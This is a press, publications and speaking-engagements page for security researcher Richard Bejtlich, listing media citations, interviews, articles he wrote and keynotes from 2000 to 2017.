- Mr. Bejtlich was cited in the Verge story LinkedIn kills its Intro email service after less than four months, published 7 February 2014.
- Mr. Bejtlich was cited in the Fast Company story We Will Create a Stronger Internet, published 14 January 2014.
- Mr. Bejtlich was mentioned in the Quartz story Will the NSA spying revelations hurt America’s nascent cyberforensics industry abroad?, published 3 January 2014.
- Mr. Bejtlich was mentioned in the Wall Street Journal story Mandiant Purchase Proves Worth of Cybersleuthing, published 2 January 2014.
- 2013
- Mr. Bejtlich was interviewed for the NextGov story The Ten Worst Hacks of 2013, published 30 December 2013.
- Mr. Bejtlich was cited in the Newsweek story How Edward Snowden Escalated Cyber War with China, published 1 November 2013.
- Mr. Bejtlich was cited in the TechTarget story Eliminating Black Hat Bargains, published 1 November 2013.
- Mr. Bejtlich was cited in the New York Times story LinkedIn’s New Mobile App Called ‘a Dream for Attackers', published 24 October 2013.
- Mr. Bejtlich was cited in the Mother Jones story CISPA Zombie Bill Is Back, With Fewer Privacy Concerns…Maybe?, published 21 October 2013.
- Mr. Bejtlich was cited in the National Defense Magazine story Shutdown, Policy Gridlock Deal Major Blows to Cybersecurity Efforts, published 9 October 2013.
- Mr. Bejtlich was cited in the Mother Jones story John McAfee Claims He Can Protect You From the NSA for $100, published 1 October 2013.
- Mr. Bejtlich was cited in the Washington Post story After Snowden revelations, China worries about cyberdefense, hackers, published 4 September 2013.
- Mr. Bejtlich was cited in the Dark Reading story Stuxnet Expert Proposes New Framework For ICS/SCADA Security, published 4 September 2013.
- Mr. Bejtlich was cited in the Foreign Affairs story DOD's Huge Plan to Stop the Next Snowden Is Going to Take A While, published 19 August 2013.
- Mr. Bejtlich was cited in the Mother Jones story Bad News: Hackers Are Coming for Your Tap Water , published 7 August 2013.
- Mr. Bejtlich was interviewed for the CBS News story How Chinese hackers steal U.S. secrets, published 7 August 2013.
- Mr. Bejtlich was interviewed by Secure Ninja TV, aired 3 August 2013.
- Mr. Bejtlich won the Economist debate on cyber war which concluded 2 August 2013.
- Mr. Bejtlich was interviewed by Bloomberg West, aired 12 July 2013.
- Mr. Bejtlich was cited in the SC Magazine story Chalk IT up: Boardroom communication, published 03 July 2013.
- Mr. Bejtlich was cited in the Washington Post story Robert J. Samuelson commentary: Internet could be more trouble than it's worth, published 01 July 2013.
- Mr. Bejtlich was cited in the Wall Street Journal story Current Account: Cyberattacks Are Banks Latest Existential Risk, published 24 June 2013.
- Mr. Bejtlich was interviewed at the Wall Street Journal's CFO Network annual conference, recorded by C-SPAN (video), on 18 June 2013.
- Mr. Bejtlich was cited in the Wall Street Journal story China's Cyber Stonewall, published 10 June 2013.
- Mr. Bejtlich was interviewed for the NPR story Cyberspying Expected To Be Discussed At U.S.-China Summit, aired 7 June 2013.
- Mr. Bejtlich was interviewed for the Washington Post story Chinese Hackers Stealing Almost Everything, aired 7 June 2013.
- Mr. Bejtlich was interviewed for the Bloomberg West story U.S., China Prepare to Discuss Cybersecurity, aired 6 June 2013.
- Mr. Bejtlich was interviewed for the To the Point story China, Cyber Espionage and Controlling the Internet, aired 4 June 2013.
- Mr. Bejtlich was interviewed for the Politico story President Obama likely to talk softly with China on cyber-snooping, published 2 June 2013.
- Mr. Bejtlich was interviewed for the Mother Jones story Why Iran's Hackers Might Be Scarier Than China's, published 30 May 2013.
- Mr. Bejtlich was cited in the CBS News story How Chinese hackers steal U.S. secrets, published 29 May 2013.
- Mr. Bejtlich was cited in the Daily Beast story Hackers Are Spying on You, published 29 May 2013.
- Mr. Bejtlich was interviewed for the Four Corners story Hacked, aired 27 May 2013.
- Mr. Bejtlich was cited in the Voice of America story China Resumes Cyber Attacks on US, Firm Says, published 20 May 2013.
- Mr. Bejtlich was interviewed for the Federal News Radio story Cybersecurity and Crowdfunding, aired 16 May 2013.
- Mr. Bejtlich was cited in the Bloomberg story Apple, Samsung Devices Seen Raising Pentagon’s Cyber Risk, published 15 May 2013.
- Mr. Bejtlich was cited in the NextGov story A Week After it was Mysteriously Disabled, U.S. Forces-Korea Website Returns, published 8 April 2013.
- Mr. Bejtlich was cited in the Forbes story A Different Approach To Foiling Hackers? Let Them In, Then Lie To Them, published 5 April 2013.
- Mr. Bejtlich was cited in the USA Today story Pentagon seeking 'rules of engagement' for cyber-war, published 4 April 2013.
- Mr. Bejtlich was cited in the Fast Company story Hacked? Mandiant's Cyberattack Detectives Want To Know All About It, published 3 April 2013.
- Mr. Bejtlich was cited in the Bloomberg story Security Fears Give Way to Economics as Cloud Computing Grows, published 27 March 2013.
- Mr. Bejtlich was cited in the Washington Examinber story NASA chief failed to tell Congress of 118 Chinese nationals working in IT, published 25 March 2013.
- Mr. Bejtlich was cited in the PCWorld story Security experts warn about Iran and North Korea hackers, published 24 March 2013.
- Mr. Bejtlich was cited in the ThreatPost story Experts Tell Congress Serious Deterrence Needed to Impede Foreign Cyber Attacks, published 21 March 2013.
- Mr. Bejtlich was cited in the Economic Times story China spends massively on cyber spying, US Congress told, published 20 March 2013.
- Mr. Bejtlich was interviewed for the CNBC story Cybersecurity Firm Says It Is Under Attack, published 20 March 2013.
- Mr. Bejtlich was cited in the Economist story Can You Keep a Secret?, published 16 March 2013.
- Mr. Bejtlich was cited in the Dark Reading story Medical Industry Under Attack By Chinese Hackers, published 14 March 2013.
- Mr. Bejtlich was cited in the LA Times story China hacker's angst opens a window onto cyber-espionage, published 12 March 2013.
- Mr. Bejtlich was cited in the CNN story Watch where you click: International cyber attacks on the rise, published 12 March 2013.
- Mr. Bejtlich was interviewed by Soledad O'Brien for CNN, with video, aired 11 March 2013.
- Mr. Bejtlich was cited in the Nation story , published 4 March 2013.
- Mr. Bejtlich was interviewed for the Computerworld story Mandiant's Richard Bejtlich on China, IP and the new cyber war, published 27 February 2013.
- Mr. Bejtlich was cited in the SC Magazine story RSA 2013: Hackers will get in, so spend the money on pushing them out, published 27 February 2013.
- Mr. Bejtlich was interviewed on the Kojo Nnamdi show for the segment titled Tracking Chinese Hackers, aired 26 February 2013.
- Mr. Bejtlich was interviewed for the IT Web story Formulating an attack-focused security plan, published 26 February 2013.
- Mr. Bejtlich was cited in the Asian Correspondent story Analysis: Detailed China hacking report leaves little room for doubt, published 25 February 2013.
- Mr. Bejtlich was cited in the Economist story Cybercrime: Smoking Gun, published 23 February 2013.
- Mr. Bejtlich was cited in the Reuters story Mandiant goes viral after China hacking report, published 23 February 2013.
- Mr. Bejtlich was interviewed for the Forbes article The Shanghai Army Unit That Hacked 115 U.S. Targets Likely Wasn't Even China's 'A-Team', published 21 February 2013.
- Mr. Bejtlich was interviewed for the Nightly Business Report TV show, with transcript and video, aired 21 February 2013.
- Mr. Bejtlich was cited in the China Daily story US hacking into China a common problem, published 21 February 2013.
- Mr. Bejtlich was cited in the China Daily story 'Cyberattacks using US IPs' target military, published 21 February 2013.
- Mr. Bejtlich was interviewed for the Mother Jones story Chinese Cyberwarfare, Explained, published 21 February 2013.
- Mr. Bejtlich was cited in the CSO Online story Mandiant Gaines Instant Fame After Chinese Hack Report, published 21 February 2013.
- Mr. Bejtlich was cited in the Dark Reading story Attribution Delivers Questionable Security Value, published 20 February 2013.
- Mr. Bejtlich was cited in the Scotsman story Chinese military unit .behind hacking attacks, published 20 February 2013.
- Mr. Bejtlich was interviewed for the NPR story How Could The U.S. Respond To Chinese Hacking?, published 20 February 2013.
- Mr. Bejtlich was interviewed for the Digital Trends story China is waging an undeclared cyberwar on the US . but now what?, published 20 February 2013.
- Mr. Bejtlich was cited in the Voice of America story Chinese Army Rejects US Report on Cyber Hacking, published 20 February 2013.
- Mr. Bejtlich was cited in the Washington Post story Report ties cyberattacks on U.S. computers to Chinese military, published 19 February 2013.
- Mr. Bejtlich was interviewed for the Voice of America video story US Firm Links Chinese Army to Cyber Attacks, aired 19 February 2013.
- Mr. Bejtlich was interviewed on the PBS Newshour TV show, with video and transcript, aired 19 February 2013.
- Mr. Bejtlich was cited in the Associated Press story US ready to strike back against China cyberattacks, published 19 February 2013.
- Mr. Bejtlich was cited in the eWeek story Chinese Military Group Identified in Attacks on U.S. Networks: Mandiant, published 19 February 2013.
- Mr. Bejtlich was cited in the Dark Reading story Chinese Military Tied To Major Cyberespionage Operation, published 19 February 2013.
- Mr. Bejtlich was interviewed for the print and TV Sky News HD story Chinese Military's 'Global Hacking HQ Found', published and aired 19 February 2013.
- Mr. Bejtlich was cited in the American Banker story Banks Eyeing China Vulnerable to Army Cyberattack: Report, published 19 February 2013.
- Mr. Bejtlich was cited in the LA Times story Computer security firm blames cyber spying on Chinese military, published 19 February 2013.
- Mr. Bejtlich was interviewed for the Fiscal Times story Chinese Attacks Reveal an Undeclared Global Cyber War, published 19 February 2013.
- Mr. Bejtlich was cited in the Fiscal Times story Pentagon Readies a Cyber Arsenal to Fight Attackers, published 18 February 2013.
- Mr. Bejtlich was cited in the IT Pro Portal story Defence industry looks to cash in on soaring cyber-spend, published 18 February 2013.
- Mr. Bejtlich was cited in the NPR story Victims Of Cyberattacks Get Proactive Against Intruders, published 13 February 2013.
- Mr. Bejtlich was cited in the NPR story In Cyberwar, Software Flaws Are A Hot Commodity, published 12 February 2013.
- Mr. Bejtlich was a guest on the Diane Rehm Show on 12 February 2013.
- Mr. Bejtlich was cited in the Foreign Policy story What cyber security execs want to see from the government, published 11 February 2013.
- Mr. Bejtlich was citied in the Entrepreneur Magazine story Is Your Business Ready for Cyber War?, published 11 February 2013.
- Mr. Bejtlich was cited in the Washington Post story Secret Service investigating hack of Bush family e-mails, published 8 February 2013.
- Mr. Bejtlich was cited in the Bloomberg story Mandiant, the Go-To Security Firm for Cyber-Espionage Attacks, published 7 February 2013.
- Mr. Bejtlich was cited in the Defense News story DoD Faces Cyber Expert Talent Shortage, published 6 February 2013.
- Mr. Bejtlich was cited in the FCW story DOE data breach came after warnings, published 5 February 2013.
- Mr. Bejtlich was cited in the Economist story War on terabytes, published 2 February 2013.
- Mr. Bejtlich was interviewed by Australia's ABC PM radio program for their story China-based hackers attack NYT computer system, aired 1 February 2013. Audio available (.mp3)
- Mr. Bejtlich was cited in the AP story US weighs tougher action over China cyberattacks, published 1 February 2013.
- Mr. Bejtlich was cited in the Daily Beast story Is New York Times Hacking Just the Beginning?, published 1 February 2013.
- Mr. Bejtlich was cited in the CRN story Forensic Investigators Track Times Attack Step By Step, published 1 February 2013.
- Mr. Bejtlich was cited in the Krebs on Security story Source: Washington Post Also Broadly Infiltrated By Chinese Hackers in 2012, published 1 February 2013.
- Mr. Bejtlich was cited in the Wall Street Journal story Chinese Hackers Hit U.S. Media, published 31 january 2013.
- Mr. Bejtlich was interviewed for the NPR story 'New York Times' The Target Of Chinese Cyber Attack, published and aired 31 January 2013. Audio available (.mp3)
- Mr. Bejtlich was cited in the New York Times story Hackers in China Attacked The Times for Last 4 Months, published 30 January 2013.
- Mr. Bejtlich was cited in the FCW story Cybersecurity: Rejoining the battle on Capitol Hill, published 17 January 2013.
- Mr. Bejtlich was cited in the Bloomberg story A National Digital ID, Courtesy of the U.S. Postal Service?, published 11 January 2013.
- Mr. Bejtlich was cited in the Dark Reading story You Keep Using That Word, published 4 January 2013.
- Mr. Bejtlich was cited in the World Affairs article First Strike: US Cyber Warriors Seize the Offensive, published 4 January 2013.
- 2012
- Mr. Bejtlich was cited in the Register story US: We'll drag cyber-spies into COURT from their hideouts, published 20 December 2012.
- Mr. Bejtlich was cited in the Mother Jones story Defense Contractors Don't Want to Say When They've Been Hacked, published 13 December 2012.
- Mr. Bejtlich was cited in the SearchSecurity story Many in industry at odds over pending cybersecurity executive order, published 3 December 2012.
- Mr. Bejtlich was cited in The Week story Obama's war on hackers: 5 things you need to know, published 27 November 2012.
- Mr. Bejtlich was cited in the Global Security Newswire story DOE Facilities Still Have Cyber Weak Spots: IG, published 19 November 2012.
- Mr. Bejtlich was cited in the Foreign Policy story Dozens of cyber vulnerabilities found at Department of Energy facilities, published 16 November 2012.
- Mr. Bejtlich was cited in the Mother Jones story Is Obama About to Take Over the Internet?, published 16 November 2012.
- Mr. Bejtlich was cited in the Defense News story New Cyber Group Aims To Spread Basic Security, published 14 November 2012.
- Mr. Bejtlich was cited in the ComputerWorld story On the Internet, no one knows you're an authoritarian government, published 8 November 2012.
- Mr. Bejtlich was cited in the Foreign Policy story The new cyber vulnerability: Your law firm, published 7 November 2012.
- Mr. Bejtlich was cited in the Foreign Policy story Cyber Threat of the Week, published 6 November 2012.
- Mr. Bejtlich was cited in the SC story Monster Breach Hits SC Taxpayers, published 26 October 2012.
- Mr. Bejtlich was cited in the Slate story Republicans Warn Obama: Cybersecurity Executive Order Will Practically Destroy the Internet, published 15 October 2012.
- Mr. Bejtlich was cited in the Navy Times story Panetta outlines new cyber doctrine for DoD, published 13 October 2012.
- Mr. Bejtlich was cited in the Slashdot story U.S. Defense Secretary Warns of a Possible 'Cyber-Pearl Harbor', published 13 October 2012.
- Mr. Bejtlich was cited in the AP story US warning reflects fears of Iranian cyberattack, published 12 October 2012.
- Mr. Bejtlich was cited in the PC Advisory story Huawei: Separating Fact from Fiction, published 10 October 2012.
- Mr. Bejtlich was cited in the Dark Reading story Congressional Intelligence Committee Warns Against Doing Business With Chinese Telecom Firms, published 8 October 2012.
- Mr. Bejtlich was cited in the Info Security story http://www.infosecurity-magazine.com/view/28481/the-ten-security-issues-guaranteed-to-cause-a-flamewar, published 27 September 2012.
- Mr. Bejtlich was cited in the CRN story The Paradox Of Apple Security: Does Secrecy Make You Safer?, published 21 September 2012.
- Mr. Bejtlich was cited in the Associated Press story Panetta talks computer hacking issues with Chinese, published 20 September 2012.
- Mr. Bejtlich was cited in the Dark Reading story The Data Annihilation Attack Is Back, published 12 September 2012.
- Mr. Bejtlich was cited in the Federal Computer Week story Federal data breaches: How long is too long to inform victims?, published 10 September 2012.
- Mr. Bejtlich was cited in the New York Review of Books story Are Hackers Heroes?, published 7 September 2012.
- Mr. Bejtlich was interviewed for the TV program This Week in Defense News with Vago Muradian, broadcast 1 September 2012.
- Mr. Bejtlich was cited in the Federal Computer Week story Is the government dropping the ball on cybersecurity?, published 23 August 2012.
- Mr. Bejtlich was interviewed in the HP story Transform Your Puny Weakling Tech Muscles into InfoSec BRAWN!, published 8 August 2012.
- Mr. Bejtlich was cited in the Defense News story Experts: Cloud Brings Vulnerabilities, published 30 July 2012.
- Mr. Bejtlich was cited in the SearchSecurity story Network threat detection moves beyond signatures, published 3 July 2012.
- Mr. Bejtlich was cited in the Dark Reading story The Enterprise Strikes Back, published 25 June 2012.
- Mr. Bejtlich was cited in the Dark Reading story The Intersection Between Cyberespionage And Cybercrime, published 21 June 2012.
- Mr. Bejtlich was cited in the Newsweek story The Stuxnet Leak Was a Valuable Warning Shot, published 18 June 2012.
- Mr. Bejtlich was cited in the DefenseNews story Building Better Red Teams, published 14 June 2012.
- Mr. Bejtlich was cited in the CRN story Apple To Make First Official Appearance At Black Hat Next Month, published 11 June 2012.
- Mr. Bejtlich was cited in the Dark Reading story Companies See Business In 'Doxing' The Adversary, published 31 May 2012.
- Mr. Bejtlich was cited in the Associated Press story Iran, other Mideast states hit by computer virus, published 29 May 2012.
- Mr. Bejtlich was cited in the Dark Reading story Selling a Secure Internet Domain, published May 17 2012.
- Mr. Bejtlich was interviewed for the NPR story Cybersecurity Firms Ditch Defense, Learn To 'Hunt', aired May 10 2012.
- Mr. Bejtlich was interviewed for the NPR story Cyber Briefings 'Scare The Bejeezus' Out Of CEOs, aired May 9 2012.
- Mr. Bejtlich was cited in the New York Times story Nissan Is Latest Company to Get Hacked, published 24 Apr 2012.
- Mr. Bejtlich was cited in the ThreatPost story E-Mail, Source Code From VMWare Bubbles Up From Compromised Chinese Firm, published 24 Apr 2012.
- Mr. Bejtlich was interviewed by BBC Radio 5 Live, aired 7 Apr 2012.
- Mr. Bejtlich was cited in the Government Computer News story Best defense? Start by admitting hackers will get in anyway, published 5 Apr 2012.
- Mr. Bejtlich was cited in the Dark Reading story Damage Mitigation As The New Defense, published 5 Apr 2012.
- Mr. Bejtlich was interviewed for the NPR story 'Anonymous' Hacking Group Threatens The Internet, aired 30 Mar 2012.
- Mr. Bejtlich was cited in the Wall Street Journal story US Outgunned in Hacker War, updated 28 Mar 2012.
- Mr. Bejtlich was cited in the Dark Reading story 'Anonymous' Legacy: Hacktivists Stole More Data Than Organized Crime In 2011 Breaches Worldwide. published 22 Mar 2012.
- Mr. Bejtlich was cited in the Wall Street Journal story Alert on Hacker Power Play, published 21 February 2012, and repeated within NSA chief fears Anonymous could hit power grid: report.
- Mr. Bejtlich was interviewed for the NPR story U.S. Not Afraid To Say It: China's The Cyber Bad Guy, aired 18 Feb 2012.
- Mr. Bejtlich was cited in the ThreatPost story Did A Decade-Long Hack Trigger Nortel's Demise?, published 15 Feb 2012.
- Mr. Bejtlich was cited in the Globe and Mail story Reported hacking of Nortel fuels concerns, skepticism, published 14 Feb 2012.
- Mr. Bejtlich was cited in the Dark Reading story Six-Year-Old Breach Comes Back To Haunt Symantec, published 26 Jan 2012.
- Mr. Bejtlich was cited in the Bloomberg story DuPont, Makhteshim, Kodak, News Corp: Intellectual Property published 11 Jan 2012.
- Mr. Bejtlich was cited in the Bloomberg story SEC Push May Yield New Disclosures of Company Cyber Attacks published 10 Jan 2012.
- Mr. Bejtlich was cited in the Popular Mechanics story Digital Spies: The Secret War, appearing in the Jan 2012 issue.
- 2011
- Mr. Bejtlich was cited in the Dark Reading Story Dastardly Dozen: A Few APT Groups Carry Out Most Attacks published 19 Dec 2011.
- Mr. Bejtlich was cited in the Bloomberg story China-Based Hacking of 760 Companies Shows Cyber Cold War published 14 Dec 2011.
- Mr. Bejtlich was cited in the Dark Reading story APT Or Not APT? Discovering Who Is Attacking The Network published 21 Nov 2011.
- Mr. Bejtlich was cited in the CSO Online story Experts advise caution, information sharing in wake of alleged utility attacks published 21 Nov 2011.
- Mr. Bejtlich was cited in the SearchSecurity story Confusion over APT attacks leads to misguided security effort published 15 Nov 2011.
- Mr. Bejtlich was interviewed for the SearchSecurity story Marcus Ranum chat: Information security monitoring published 1 Nov 2011.
- Mr. Bejtlich was cited in the ComputerWorld story Hard to fully assess Duqu threat yet, researchers say published 21 Oct 2011.
- Mr. Bejtlich was cited in the Canadian Business story Spies Like Them published 20 Oct 2011.
- Mr. Bejtlich was interviewed for the Financial Times video report The expanding cyber industrial complex published 11 Oct 2011.
- Mr. Bejtlich was cited in the DefenseNews story Ex-CIA Chief Calls for Less Cyber Secrecy published 6 Oct 2011.
- Mr. Bejtlich was cited in the Dark Reading story A Call To Disarm Black Hat Hackers In China published 21 Sep 2011.
- Mr. Bejtlich was cited in the Dark Reading story APT Attackers Hit Japan's Biggest Defense Contractor published 19 Sep 2011.
- Mr. Bejtlich was cited in the New York Times story Hacker Rattles Security Circles published 11 Sep 2011.
- Mr. Bejtlich was cited in the Network World story Peeling the Security Onion, published 10 September 2011.
- Mr. Bejtlich was cited in the Dark Reading story To Catch an APT published 8 Sep 2011.
- Mr. Bejtlich was cited in the SC Magazine story Advanced persistent threats call for a reality check published 7 Sep 2011.
- Mr. Bejtlich was cited in the SC Magazine story Breaking the next case published 1 Sep 2011.
- Mr. Bejtlich was interviewed in the Dark Reading video MANDIANT CSO Talks Threats To His Company and His Clients, published 10 Aug 2011.
- Mr. Bejtlich was cited in the Dark Reading story APT Attackers Used Chinese-Authored Hacker Tool To Hide Their Tracks, published 3 Aug 2011.
- Mr. Bejtlich was cited in the Dark Reading story High-Profile Hacks Prompt High-Powered Hires, published 23 Jun 2011.
- Mr. Bejtlich was cited in the Dark Reading story Richard Bejtlich To Join MANDIANT As Chief Security Officer, Security Services Architect, published 17 Mar 2011.
- 2010
- Mr. Bejtlich was cited in the Reuters story Special report: The Pentagon's new cyber warriors, published 5 Oct 2010.
- Mr. Bejtlich was interviewed by Gary McGraw for the Silver Bullet Podcast, published 23 Aug 2010.
- Mr. Bejtlich was cited in the Wired magazine article Security Watch: Beware the NSA’s Geek-Spy Complex, published in Mar 2010.
- Mr. Bejtlich was interviewed for the PaulDotCom Podcast on 18 Mar 2010.
- 2009
- Mr. Bejtlich was interviewed for the Security Justice Podcast on 7 Nov 2009.
- Mr. Bejtlich interviewed colleague Ken Bradley for SANS on 2 Nov 2009.
- Mr. Bejtlich was cited in the Wired article Air Force Establishes ‘Reduced’ Cyber-War Command by David Axe on 18 Aug 2009.
- 2008
- Mr. Bejtlich was cited in the Economist article Marching Off to Cyberwar in the 4 Dec 2008 issue.
- Mr. Bejtlich was cited in the Wired article Estonia, Google Help 'Cyberlocked' Georgia by Noah Schachtman on 11 Aug 2008.
- Mr. Bejtlich was cited in the CSO article Cost-Cutting Through Green IT Security: Real or Myth? by Bill Brenner on 25 Jun 2008.
- Mr. Bejtlich featured as the cover story of the May 2008 issue of CSO Magazine with an article titled Incident Detection, Response, and Forensics.
- 2007
- Bill Brenner commented on Mr. Bejtlich's decision to become Director of Incident Response for General Electric in the article Richard Bejtlich: I'm Not Dead.
- Mr. Bejtlich was interviewed for the Sites Collide podcast.
- 2006
- Mr. Bejtlich was cited in the story Sourcefire IPO Could Fuel Snort, Users Say.
- Mr. Bejtlich was interviewed for the CyberSpeak Podcast.
- Mr. Bejtlich was interviewed for the Network Security Podcast.
- Mr. Bejtlich was interviewed for the Threat Chaos Podcast.
- Mr. Bejtlich was interviewed for the Run Your Own Server Podcast.
- The July 2006 issue of Information Security magazine features Mr. Bejtlich's first book, The Tao of Network Security Monitoring, as one of their Top Ten Books.
- Mr. Bejtlich was cited in the June 2006 issue of Information Security magazine, in the article Today's Attackers Can Find the Needle.
- Mr. Bejtlich was interviewed for the BSDTalk Podcast.
- Mr. Bejtlich was quoted by Processor.com.
- 2000-2005
- Mr. Bejtlich's comments on Renesys were reported in the Manchester Union Leader.
- Bookpool published Mr. Bejtlich's favorite 10 computer books of the past 10 years.
- Reuters reporter Andy Sullivan asked Mr. Bejtlich to comment for his 22 February 2005 story Paris Hilton Exposed on Web After Phone Hacked.
- Mr. Bejtlich was quoted by Shawna McAlearney of SearchSecurity.com in her 16 December 2004 article Nessus No Longer Free.
- Net Optics published a press release describing their products in the context of Mr. Bejtlich's books.
- The new Syngress book Security Sage's Guide to Hardening the Network Infrastructure mentions Mr. Bejtlich and the TaoSecurity Blog in relation to Snort.
- Dru Lavigne mentioned the TaoSecurity Blog in her article Interesting New Ports at the O'Reilly BSD Devcenter.
- Anton Chuvakin wrote this blog entry profiling TaoSecurity Blog.
- Mr. Bejtlich reviewed a draft of the Honey Project's book, Know Your Enemy: Revealing the Security Tools, Tactics, and Motives of the Blackhat Community. He is mentioned in the preface as a reviewer.
- Lance Spitzner was kind enough to mention Mr. Bejtlich in the preface to his latest book, Honeypots: Tracking Hackers.
- Stephen Northcutt and Judy Novak were kind enough to mention Mr. Bejtlich in the third edition of Network Intrusion Detection.
- Mr. Bejtlich reviewed two drafts of Hack I.T.: Security Through Penetration Testing, and he is mentioned in the acknowledgements.
- Two of Mr. Bejtlich's letters to the editor of Information Security magazine were published in the June 2002 issue. 'Name withheld upon request' is Mr. Bejtlich as well.
- Sandra Lowe-Sanchez interviewed Mr. Bejtlich and asked for his opinion of Turillion's web server protection product. Note his name is spelled "Bejtlick" in this 11 January 2002 article.
- Ed Tittel mentioned one of Mr. Bejtlich's Amazon.com reading lists in this article at TechTarget.com.
- Paul Innella wrote a history of intrusion detection systems that mentions the Automated Security Incident Measurement (ASIM) technology Mr. Bejtlich used in the Air Force.
- Deseret News, a Salt Lake City-based newspaper, interviewed Mr. Bejtlich on 24 August 2001 regarding security threats to Air Force networks. Incidentally, that day an Associated Press story reported a retired Air Force sergeant was accused of espionage after allegedly stealing classified data.
- NewsBytes, once a division of The Washington Post Company, interviewed Mr. Bejtlich after he posted a warning of the Code Red worm on 15 July 2001.
- A San Antonio Business Journal story from 29 June 2001 described Mr. Bejtlich's responsibilities at BATC, including network security monitoring and incident response.
- Congressman Lamar Smith visited BATC's network security operations center in June 2001. Mr. Bejtlich demonstrated how he might compromise his web server while coworker Bamm Visscher demonstrated how our network security monitoring service detects similar events. This story gives a few more details. Congressman Smith cited his visit to BATC while speaking on the House floor.
- The summer 2001 issue of 2600 magazine featured Mr. Bejtlich's photograph of a phone in Kusadasi, Turkey.
- On 29 May 2001 Mr. Bejtlich's work on interpreting network traffic was mentioned in an article by Duane Dunston at LinuxSecurity.com.
- On 30 September 2000 The Learning Channel aired a show called Best Kept Secrets of the US Military that featured the AFCERT (taped 19 May 2000). (.mpg, 49 MB)
- The inside cover of Network Intrusion Detection, 2nd Edition quotes Mr. Bejtlich regarding the usefulness of the book. This Amazon.com page features that quote, listed as "From the Inside Flap."
Reference: TaoSecurity Research
2015 and later:
- Please visit Academia.edu for Mr. Bejtlich's most recent research.
- Seven Tips for Small Business Security, in the Huffington Post, 18 June 2014
- Strategy, Not Speed: What Today's Digital Defenders Must Learn From Cybersecurity's Early Thinkers, for the Brookings Institution, 7 May 2014
- What Federal Cyber Breach Notifications Really Mean for Business, for the Brookings Institution, 25 March 2014
- Don't Underestimate Cyber Spies: How Virtual Espionage Can Lead to Actual Destruction in Foreign Affairs, 2 May 2013
- Become a Hunter in the targeted-threat-centric Information Security Magzine, July-August 2011 (.pdf)
- Directions in Incident Detection and Response (.pdf) in the January/February 2011 issue of IEEE Security and Privacy magazine
- Understanding the Advanced Persistent Threat in Information Security Magazine, July 2010
- Traffic Talk issues 1, 2, 3, 4, 5, 6, 7, 8, 9, 10
- Snort Report issues 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22
- Keeping FreeBSD Applications Up-to-Date in BSD Magazine
- Keeping FreeBSD Up-To-Date: OS Essentials in BSD Magazine
- Computer Incident Detection, Response, and Forensics in CSO Online
- Tuning Snort, in the August 2006 Sys Admin magazine
- Network Security Monitoring: Beyond Intrusion Detection, in Volume 8, No. 4 of the IA Newsletter
- Keeping FreeBSD Up to Date, in the February 2006 Sys Admin magazine
- Engineering Disasters in the December 2005 issue of Information Security Magazine.
- Using Attack Responses to Improve Intrusion Detection
- Structured Traffic Analysis in the October 2005 (IN)SECURE magazine (.pdf)
- More Tools for Network Security Monitoring, in the February 2005 Sys Admin magazine
- Keeping FreeBSD Applications Up-To-Date, also published in the December 2004 and January 2005 issues of Daemon News.
- Keeping FreeBSD Up-To-Date, also published in the November 2004 issue of Daemon News.
- Sguil Installation Script
- Considering Convergence? .pdf, published as an Addison-Wesley-sponsored supplement to the November 2004 issue of Dr. Dobb's Journal
- Integrating the Network Security Model (.pdf, .ps), in the April 2004 Sys Admin magazine
- Simplicity and Awareness: Keys to Network Security for the World Markets Research Centre's Global InfoSecurity 2002 report. (The article is a bit formal, and features a small amount of creative editing by the WMRC staff. Mr. Bejtlich certainly didn't intend for "UNIX" to be defined as a "Uniplexed Information and Computer System!")
- Network Intrusion Detection of Third Party Effects, published 05 September 2000
- Interpreting Network Traffic: A Network Intrusion Detector's Look at Suspicious Events, originally published 28 October 1999
Reference: TaoSecurity News
- 2017
-
- Mr. Bejtlich led a podcast titled Threat Hunting: Past, Present, and Future, in early July 2017. He interviewed four of the original six GE-CIRT incident handlers. The audio is posted on YouTube. Thank you to Sqrrl for making the reunion possible.
- Mr. Bejtlich's latest book was inducted into the Cybersecurity Canon.
- Mr. Bejtlich is doing limited security consulting. See this blog post for details.
- 2016
-
- Mr. Bejtlich organized and hosted the Management track (now "Executive track") at the 7th annual Mandiant MIRCon (now "FireEye Cyber Defense Summit") on 29-30 November 2016.
- Mr. Bejtlich delivered the keynote to the 2016 Air Force Senior Leaders Orientation Conference at Joint Base Andrews on 29 July 2016.
- Mr. Bejtlich delivered the keynote to the FireEye Cyber Defense Live Tokyo event in Tokyo on 12 July 2016.
- Mr. Bejtlich delivered the keynote to the New Zealand Cyber Security Summit in Auckland on 6 May 2016.
- Mr. Bejtlich delivered the keynote to the Lexpo Summit in Amsterdam on 21 April 2016. Video posted here.
- Mr. Bejtlich discussed cyber security campaigns at the 2016 War Studies Cumberland Lodge Conference near London on 30 March 2016.
- Mr. Bejtlich offered a guest lecture to the Wilson Center Congressional Cybersecurity Lab on 5 February 2016.
- Mr. Bejtlich delivered the keynote to the SANS Cyber Threat Intelligence Summit on 4 February 2016. Slides and video available.
- 2015
-
- Mr. Bejtlich spoke on a panel at the DefenseOne Summit on 2 November 2015.
- Mr. Bejtlich spoke on a panel at the AEI Internet Strategy event on 27 October 2015.
- Mr. Bejtlich organized and hosted the Management track at the 6th annual Mandiant MIRCon on 13-14 October 2015.
- Mr. Bejtlich testified to the House Foreign Affairs Committee on 7 October 2015.
- Mr. Bejtlich testified to the House Armed Services Committee on 30 September 2015.
- Mr. Bejtlich delivered a keynote at the 2015 Army Cyber Institute Cyber Talks on 22 September 2015 in Washington, DC.
- Mr. Bejtlich delivered a keynote at the 2015 Security Onion Conference on 11 September 2015 in Augusta, GA.
- Mr. Bejtlich delivered a keynote at the 2015 World Services Group Conference on 10 September 2015 in New York, NY.
- Mr. Bejtlich delivered a keynote at the CoBank 2015 Communications Industry Executive Forum on 19 August 2015 in Colorado Springs, CO.
- Mr. Bejtlich delivered a keynote at the Black Hat USA 2015 CISO Summit on 4 August 2015 in Las Vegas, NV.
- Mr. Bejtlich participated in an panel hosted by AEI on 22 July 2015, with video.
- Mr. Bejtlich spoke on a panel at the Chatham House Cyber 2015 event, 2-3 July 2015 in London, UK.
- Mr. Bejtlich participated in a panel hosted by the National Journal on 24 June 2015.
- Mr. Bejtlich testified to the House Committee on Financial Services Subcommittee on Oversight and Investigations on 16 June 2015.
- Mr. Bejtlich spoke on a panel at the Cyber Summit USA on 3 June 2015.
- Mr. Bejtlich testified to the House Permanent Select Committee on Intelligence on 19 March 2015.
